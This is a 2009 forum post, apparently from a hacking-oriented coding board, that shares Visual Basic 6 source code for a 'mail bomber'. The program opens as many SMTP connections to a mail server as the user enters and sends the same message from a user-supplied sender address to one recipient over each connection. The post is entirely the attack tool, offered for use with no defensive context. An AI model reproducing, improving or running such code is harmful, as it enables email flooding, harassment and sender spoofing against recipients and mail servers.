Fucking FAILURE! - Shad0w
Would you like to react to this message? Create an account in a few clicks or log in to continue.

Fucking FAILURE! - Shad0w
 
HomePortalLatest imagesRegisterLog in
Top posters
shad0w
[VB6] Mail Bomber [Code] I_vote_lcap[VB6] Mail Bomber [Code] I_voting_bar[VB6] Mail Bomber [Code] I_vote_rcap 
rdwuestewald
[VB6] Mail Bomber [Code] I_vote_lcap[VB6] Mail Bomber [Code] I_voting_bar[VB6] Mail Bomber [Code] I_vote_rcap 
Crush Combat
[VB6] Mail Bomber [Code] I_vote_lcap[VB6] Mail Bomber [Code] I_voting_bar[VB6] Mail Bomber [Code] I_vote_rcap 
banksy
[VB6] Mail Bomber [Code] I_vote_lcap[VB6] Mail Bomber [Code] I_voting_bar[VB6] Mail Bomber [Code] I_vote_rcap 
Kewley
[VB6] Mail Bomber [Code] I_vote_lcap[VB6] Mail Bomber [Code] I_voting_bar[VB6] Mail Bomber [Code] I_vote_rcap 
Ashley
[VB6] Mail Bomber [Code] I_vote_lcap[VB6] Mail Bomber [Code] I_voting_bar[VB6] Mail Bomber [Code] I_vote_rcap 
Anthony
[VB6] Mail Bomber [Code] I_vote_lcap[VB6] Mail Bomber [Code] I_voting_bar[VB6] Mail Bomber [Code] I_vote_rcap 
Inix
[VB6] Mail Bomber [Code] I_vote_lcap[VB6] Mail Bomber [Code] I_voting_bar[VB6] Mail Bomber [Code] I_vote_rcap 
mitch
[VB6] Mail Bomber [Code] I_vote_lcap[VB6] Mail Bomber [Code] I_voting_bar[VB6] Mail Bomber [Code] I_vote_rcap 
dukemaster95
[VB6] Mail Bomber [Code] I_vote_lcap[VB6] Mail Bomber [Code] I_voting_bar[VB6] Mail Bomber [Code] I_vote_rcap 
Who is online?
In total there is 1 user online :: 0 Registered, 0 Hidden and 1 Guest

None

Most users ever online was 29 on Mon Aug 14, 2023 12:16 pm

 

 [VB6] Mail Bomber [Code]

Go down 
AuthorMessage
shad0w




Number of posts : 173
Points : 238
Reputation : 0
Registration date : 2009-03-18
Location : 127.0.0.1

[VB6] Mail Bomber [Code] Empty
PostSubject: [VB6] Mail Bomber [Code]   [VB6] Mail Bomber [Code] EmptyThu Mar 19, 2009 7:36 pm

Code:
Private Sub Command1_Click()
For i = 1 To Text5.Text
On Error Resume Next
smtp(i).Close
Unload smtp(i)
On Error Resume Next
Load smtp(i)
DoEvents
smtp(i).Connect txtserver.Text, 25
Next
End Sub

Private Sub Command2_Click()
For i = 1 To smtp(smtp.Count) - 1
smtp(i).Close
Unload smtp(i)
Next
End Sub

Private Sub smtp_Connect(Index As Integer)
DoEvents
Text6.Text = Text6.Text & "Connected" & vbCrLf
DoEvents
smtp(Index).SendData "HELO " & smtp(Index).LocalIP
DoEvents
smtp(Index).SendData "mail from:" & Text2.Text & vbCrLf
DoEvents
smtp(Index).SendData "mail from:" & Text2.Text & vbCrLf
DoEvents
smtp(Index).SendData "mail from:" & Text2.Text & vbCrLf
DoEvents
smtp(Index).SendData "rcpt to:" & Text1.Text & vbCrLf
DoEvents
smtp(Index).SendData "DATA" & vbCrLf
DoEvents
smtp(Index).SendData "subject: " & Text3.Text & vbCrLf
DoEvents
smtp(Index).SendData Text4.Text & vbCrLf
DoEvents
smtp(Index).SendData vbCrLf & "." & vbCrLf
DoEvents
smtp(Index).SendData "quit" & vbCrLf
DoEvents
End Sub

Private Sub smtp_DataArrival(Index As Integer, ByVal bytesTotal As Long)
Dim Data As String
On Error Resume Next
smtp(Index).GetData Data
On Error Resume Next
DoEvents
Text6.Text = Text6.Text & Data
DoEvents
End Sub

Private Sub Text6_Change()
Text6.SelStart = Len(Text6.Text)
End Sub
Back to top Go down
 
[VB6] Mail Bomber [Code]
Back to top 
Page 1 of 1
 Similar topics
-
» [C++] Hello World [Code/Tut]
» [VB6] Pythagorean Theorum [Code]

Permissions in this forum:You cannot reply to topics in this forum
Fucking FAILURE! - Shad0w :: Shad0w's Computer Section :: Coding :: Visual Basic-
Jump to: